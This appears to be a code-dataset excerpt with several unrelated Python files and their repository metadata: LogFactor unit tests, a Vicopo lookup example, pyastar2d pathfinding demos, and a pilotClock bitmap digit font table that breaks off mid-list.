|
5dc968cc4a98a5d0b018f54c4c7023b2a2682795
|
[
"MIT"
] | null | null | null |
aiida_sirius/upf_to_json/__init__.py
|
simonpintarelli/aiida-sirius
|
5dc968cc4a98a5d0b018f54c4c7023b2a2682795
|
[
"MIT"
] | null | null | null |
from .upf_to_json import upf_to_json
| 18.5
| 36
| 0.864865
| 8
| 37
| 3.5
| 0.625
| 0.357143
| 0.642857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.848485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
a21a9a1e3adc93f5817ccfe90698420f098a3898
| 5,761
|
py
|
Python
|
tests/log_factor_test.py
|
Edderic/linx
|
24fe3e043c991fd01dbf1dcab978d5ab2b8a7b76
|
[
"MIT"
] | null | null | null |
tests/log_factor_test.py
|
Edderic/linx
|
24fe3e043c991fd01dbf1dcab978d5ab2b8a7b76
|
[
"MIT"
] | null | null | null |
tests/log_factor_test.py
|
Edderic/linx
|
24fe3e043c991fd01dbf1dcab978d5ab2b8a7b76
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
from ..linx.log_factor import LogFactor
from ..linx.data import ParquetData
from .conftest import (assert_approx_value_df, get_tmp_path, clean_tmp)
def test_log_factor_add():
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(0.5)},
{'x': 0, 'y': 1, 'value': np.log(0.6)},
{'x': 1, 'y': 0, 'value': np.log(0.8)},
{'x': 1, 'y': 1, 'value': np.log(0.7)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
df_2 = pd.DataFrame([
{'x': 0, 'value': np.log(0.5)},
{'x': 1, 'value': np.log(0.2)},
])
log_factor_2 = LogFactor(
ParquetData(
df_2,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.add(log_factor_2)
expected_df = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(0.25)},
{'x': 0, 'y': 1, 'value': np.log(0.3)},
{'x': 1, 'y': 0, 'value': np.log(0.16)},
{'x': 1, 'y': 1, 'value': np.log(0.14)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
def test_log_factor_subtract():
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(0.5)},
{'x': 0, 'y': 1, 'value': np.log(0.6)},
{'x': 1, 'y': 0, 'value': np.log(0.9)},
{'x': 1, 'y': 1, 'value': np.log(0.3)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
df_2 = pd.DataFrame([
{'x': 0, 'value': np.log(0.1)},
{'x': 1, 'value': np.log(0.3)},
])
log_factor_2 = LogFactor(
ParquetData(
df_2,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.subtract(log_factor_2)
expected_df = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(5)},
{'x': 0, 'y': 1, 'value': np.log(6)},
{'x': 1, 'y': 0, 'value': np.log(3)},
{'x': 1, 'y': 1, 'value': np.log(1)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
def test_sum_even_groupings_1():
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(0.3)},
{'x': 0, 'y': 1, 'value': np.log(0.1)},
{'x': 1, 'y': 0, 'value': np.log(0.7)},
{'x': 1, 'y': 1, 'value': np.log(0.9)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.sum('x')
expected_df = pd.DataFrame([
{'y': 0, 'value': np.log(1)},
{'y': 1, 'value': np.log(1)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
def test_sum_even_groupings_2():
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(0.1)},
{'x': 0, 'y': 1, 'value': np.log(0.2)},
{'x': 1, 'y': 0, 'value': np.log(0.3)},
{'x': 1, 'y': 1, 'value': np.log(0.4)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.sum('x')
expected_df = pd.DataFrame([
{'y': 0, 'value': np.log(0.4)},
{'y': 1, 'value': np.log(0.6)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
def test_sum_odd_groupings_1():
"""
When there are odd number of groupings, then they should be
processed accordingly.
"""
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(0.1)},
{'x': 0, 'y': 1, 'value': np.log(0.2)},
{'x': 0, 'y': 2, 'value': np.log(0.2)},
{'x': 1, 'y': 0, 'value': np.log(0.3)},
{'x': 1, 'y': 1, 'value': np.log(0.4)},
{'x': 1, 'y': 2, 'value': np.log(0.1)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.sum('y')
expected_df = pd.DataFrame([
{'x': 0, 'value': np.log(0.5)},
{'x': 1, 'value': np.log(0.8)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
def test_sum_even_and_odd_groupings_1():
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 1, 'value': np.log(0.2)},
{'x': 0, 'y': 2, 'value': np.log(0.2)},
{'x': 1, 'y': 0, 'value': np.log(0.3)},
{'x': 1, 'y': 1, 'value': np.log(0.4)},
{'x': 1, 'y': 2, 'value': np.log(0.1)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.sum('y')
expected_df = pd.DataFrame([
{'x': 0, 'value': np.log(0.4)},
{'x': 1, 'value': np.log(0.8)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
def test_sum_only_one_row_groupings_1():
"""
It should do nothing to the data.
"""
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 1, 'value': np.log(0.2)},
{'x': 1, 'y': 2, 'value': np.log(0.1)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.sum('y')
expected_df = pd.DataFrame([
{'x': 0, 'value': np.log(0.2)},
{'x': 1, 'value': np.log(0.1)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
| 22.770751
| 71
| 0.480646
| 843
| 5,761
| 3.061684
| 0.084223
| 0.138318
| 0.197598
| 0.191786
| 0.870593
| 0.868656
| 0.863231
| 0.855095
| 0.790004
| 0.790004
| 0
| 0.057619
| 0.31314
| 5,761
| 252
| 72
| 22.861111
| 0.594642
| 0.020135
| 0
| 0.659686
| 0
| 0
| 0.062032
| 0
| 0
| 0
| 0
| 0
| 0.041885
| 1
| 0.036649
| false
| 0
| 0.026178
| 0
| 0.062827
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a2299939bf4b520ceb4977bc4604e3712661e30f
| 82
|
py
|
Python
|
web/vicopo/exemple.py
|
monoulou/lrm
|
170b84ae4c68d2731fd8533f4918fd219746ba44
|
[
"MIT"
] | 25
|
2016-12-21T11:53:04.000Z
|
2021-04-02T09:12:40.000Z
|
web/vicopo/exemple.py
|
monoulou/lrm
|
170b84ae4c68d2731fd8533f4918fd219746ba44
|
[
"MIT"
] | 34
|
2016-08-09T09:02:49.000Z
|
2021-10-13T10:50:50.000Z
|
web/vicopo/exemple.py
|
monoulou/lrm
|
170b84ae4c68d2731fd8533f4918fd219746ba44
|
[
"MIT"
] | 6
|
2016-08-31T16:47:40.000Z
|
2021-11-08T10:28:41.000Z
|
from Vicopo import Vicopo
print(Vicopo.http(75001))
print(Vicopo.http('paris'))
| 13.666667
| 27
| 0.756098
| 12
| 82
| 5.166667
| 0.583333
| 0.354839
| 0.483871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067568
| 0.097561
| 82
| 5
| 28
| 16.4
| 0.77027
| 0
| 0
| 0
| 0
| 0
| 0.060976
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
bf42b3069f06a83b550d1ed6a833b9061150898c
| 2,243
|
py
|
Python
|
examples/example_path.py
|
MeganTj/pyastar2d
|
62372a82540e4abdba1fdd0746566a4cfe154be5
|
[
"MIT"
] | null | null | null |
examples/example_path.py
|
MeganTj/pyastar2d
|
62372a82540e4abdba1fdd0746566a4cfe154be5
|
[
"MIT"
] | null | null | null |
examples/example_path.py
|
MeganTj/pyastar2d
|
62372a82540e4abdba1fdd0746566a4cfe154be5
|
[
"MIT"
] | null | null | null |
import numpy as np
import pyastar2d
# The start and goal coordinates are in matrix coordinates (i, j).
start = (1, 0)
goal = (3, 3)
dist_weight=0.01
# The minimum cost must be 1 for the heuristic to be valid.
weights = np.ones((4, 4), dtype=np.float32) - np.array([[1, 0, 0, 0],
[1, 0, 0, 1],
[0, 0, 0, 1],
[0, 1, 1, 1],], dtype=np.float32)
print("Cost matrix:")
print(weights)
path = pyastar2d.astar_path(weights, dist_weight, start, goal, allow_diagonal=False)
# The path is returned as a numpy array of (i, j) coordinates.
print(f"Best path from {start} to {goal} found:")
print(path)
start = (1, 3)
goal = (3, 3)
# The minimum cost must be 1 for the heuristic to be valid.
weights = np.ones((4, 4), dtype=np.float32) - np.array([[0, 0, 0, 0],
[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 1, 1, 1],], dtype=np.float32)
print("Cost matrix:")
print(weights)
path = pyastar2d.astar_path(weights, dist_weight, start, goal, allow_diagonal=False)
# The path is returned as a numpy array of (i, j) coordinates.
print(f"Best path from {start} to {goal} found:")
print(path)
start = (2, 1)
goal = (3, 3)
# The minimum cost must be 1 for the heuristic to be valid.
weights = np.ones((4, 4), dtype=np.float32) - np.array([[0, 0, 0, 0],
[0, 1, 1, 1],
[0, 1, 0, 1],
[0, 1, 1, 1],], dtype=np.float32)
print("Cost matrix:")
print(weights)
path = pyastar2d.astar_path(weights, dist_weight, start, goal, allow_diagonal=False)
# The path is returned as a numpy array of (i, j) coordinates.
print(f"Best path from {start} to {goal} found:")
print(path)
start = (1, 2)
goal = (3, 2)
# The minimum cost must be 1 for the heuristic to be valid.
weights = np.ones((4, 4), dtype=np.float32) - np.array([[0, 0, 0, 0],
[0, 1, 1, 1],
[0, 1, 0, 1],
[0, 1, 1, 1],], dtype=np.float32)
print("Cost matrix:")
print(weights)
path = pyastar2d.astar_path(weights, dist_weight, start, goal, allow_diagonal=False)
# The path is returned as a numpy array of (i, j) coordinates.
print(f"Best path from {start} to {goal} found:")
print(path)
| 32.985294
| 84
| 0.591173
| 369
| 2,243
| 3.558266
| 0.135501
| 0.031988
| 0.031988
| 0.024372
| 0.911653
| 0.911653
| 0.907845
| 0.907845
| 0.907845
| 0.907845
| 0
| 0.069337
| 0.254124
| 2,243
| 68
| 85
| 32.985294
| 0.715481
| 0.240749
| 0
| 0.787234
| 0
| 0
| 0.120425
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.042553
| 0
| 0.042553
| 0.340426
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bf5385c1414fcb1ad0f1f297c2cc0f461e3c9e20
| 112,076
|
py
|
Python
|
pilot_fonts.py
|
hansom82/pilot-clock
|
629d743f056e1ec2fc02c56b1153f257312d6361
|
[
"MIT"
] | null | null | null |
pilot_fonts.py
|
hansom82/pilot-clock
|
629d743f056e1ec2fc02c56b1153f257312d6361
|
[
"MIT"
] | null | null | null |
pilot_fonts.py
|
hansom82/pilot-clock
|
629d743f056e1ec2fc02c56b1153f257312d6361
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Font library of pilotClock project
# (c) Hansom 2018
from PIL import Image, ImageDraw
def font2bitmapFont(font=[], font_height=8):
"""
Method for converting standard Luma font to list of PIL images
:param font: Luma font bit pattern
:param font_height: Font height
:return: List of letter images
"""
bitmap_font = []
for letter in font:
bmp = Image.new("1", (len(letter), font_height), 0)
draw = ImageDraw.Draw(bmp)
for x, byte in enumerate(letter):
for y in range(font_height):
if byte & 0x01 > 0:
draw.point((x, y), fill="white")
byte >>= 1
del draw
bitmap_font.append(bmp)
del bmp
return bitmap_font
#: Bit patterns for the pilotClock Digits, font height = 10
DIGITS_FONT = [
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x00
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x01
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x02
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x03
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x04
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x05
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x06
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x07
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x08
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x09
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x10
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x11
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x12
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x13
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x14
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x15
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x16
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x17
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x18
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x19
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ' '
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '!'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '"'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '#'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '$'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '%'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '&'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '''
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '('
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ')'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '*'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '+'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '-'
[0x0000, 0x0000, 0x0300, 0x0300, 0x0000, 0x0000, 0x0000, 0x0000], # '.'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '/'
[0x03FF, 0x03FF, 0x0301, 0x0301, 0x03FF, 0x03FF, 0x0000, 0x0000], # '0'
[0x0000, 0x0301, 0x03FF, 0x03FF, 0x0300, 0x0000, 0x0000, 0x0000], # '1'
[0x03F1, 0x03F1, 0x0311, 0x0311, 0x031F, 0x031F, 0x0000, 0x0000], # '2'
[0x0311, 0x0311, 0x0311, 0x0311, 0x03FF, 0x03FF, 0x0000, 0x0000], # '3'
[0x001F, 0x001F, 0x0010, 0x0010, 0x03FF, 0x03FF, 0x0000, 0x0000], # '4'
[0x031F, 0x031F, 0x0311, 0x0311, 0x03F1, 0x03F1, 0x0000, 0x0000], # '5'
[0x03FF, 0x03FF, 0x0311, 0x0311, 0x03F1, 0x03F1, 0x0000, 0x0000], # '6'
[0x0001, 0x0001, 0x0001, 0x0001, 0x03FF, 0x03FF, 0x0000, 0x0000], # '7'
[0x03FF, 0x03FF, 0x0311, 0x0311, 0x03FF, 0x03FF, 0x0000, 0x0000], # '8'
[0x031F, 0x031F, 0x0311, 0x0311, 0x03FF, 0x03FF, 0x0000, 0x0000], # '9'
[0x0000, 0x0000, 0x0186, 0x0186, 0x0000, 0x0000, 0x0000, 0x0000], # ':'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ';'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '<'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '='
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '>'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '?'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '@'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'A'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'B'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'C'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'D'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'E'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'F'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'G'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'H'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'I'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'J'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'K'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'L'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'M'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'N'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'O'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'P'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Q'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'R'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'S'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'T'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'U'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'V'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'W'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'X'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Y'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Z'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '['
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # backslash
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '^'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '_'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '`'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'a'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'b'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'c'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'd'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'e'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'f'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'g'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'h'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'i'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'j'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'k'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'l'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'm'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'n'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'o'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'p'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'q'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'r'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 's'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 't'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'u'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'v'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'w'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'x'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'y'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'z'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '{'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '|'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '}'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '~'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x7F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x80 p
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x81 c
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x82 т
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x83 у
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x84 ф
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x85 x
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x86 ц
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x87 ч
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x88 ш
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x89 щ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8A ъ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8B ы
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8C ь
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8D э
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8E ю
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8F я
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x90 A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x91 Б
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x92 В
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x93 Г
